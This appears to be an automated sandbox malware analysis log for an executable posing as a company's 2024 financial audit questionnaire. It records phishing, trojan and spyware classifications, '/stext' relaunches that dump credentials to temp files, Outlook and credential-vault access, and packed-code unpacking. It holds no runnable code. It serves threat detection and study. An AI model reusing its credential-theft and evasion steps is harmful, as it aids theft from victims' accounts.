              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,12_2_00413D4C
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040206A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].jsonJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsjBF01.tmpJump to behavior
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448701900.0000000033440000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691536839.0000000002813000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000003.2689183507.0000000002813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile read: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33221
              Source: unknownProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\kcthojq"
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\mfyzpcbefou"
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\xzlsqumgtwmcyb"
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\kcthojq"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\mfyzpcbefou"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\xzlsqumgtwmcyb"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.cfgJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeUnpacked PE file: 12.2.Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeUnpacked PE file: 13.2.Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeUnpacked PE file: 14.2.Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 7332, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2466748409.0000000004BEF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33571219 push esp; iretd 9_2_3357121A
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562806 push ecx; ret 9_2_33562819
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exe
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exe
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exe
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exe
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: \suzhou alpine flow control co., ltd. financial audit questionaire 2024.exeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
